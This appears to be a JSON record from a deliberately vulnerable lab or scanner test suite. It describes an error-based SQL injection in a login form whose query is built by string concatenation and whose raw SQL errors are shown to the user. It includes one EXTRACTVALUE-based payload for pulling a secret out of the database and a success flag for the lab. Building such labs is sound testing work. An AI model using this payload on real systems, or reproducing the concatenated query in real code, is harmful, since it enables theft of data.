{"detect":{"cwe":"CWE-89","exploit_examples":["POST /error/ username=' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT value FROM secrets WHERE name='sqli-error')))-- "],"owasp":"A03:2021 \u2014 Injection (SQLi)","scanner_should_fire":true,"sinks":["f-string concatenation + raw exception render"],"subtype":"error-based","success_markers":["VULNLAB{sqli-error-based-extraction}"],"tags":["error-based","extractvalue","verbose-errors"]},"lab_url":"/error/","sink":"string-concatenated SELECT + raw exception render","slug":"error","source_url":"/source/error","summary":"Login query concatenates user input AND the app renders raw SQL errors.","title":"Error-based SQLi (login)","vulnerable":true}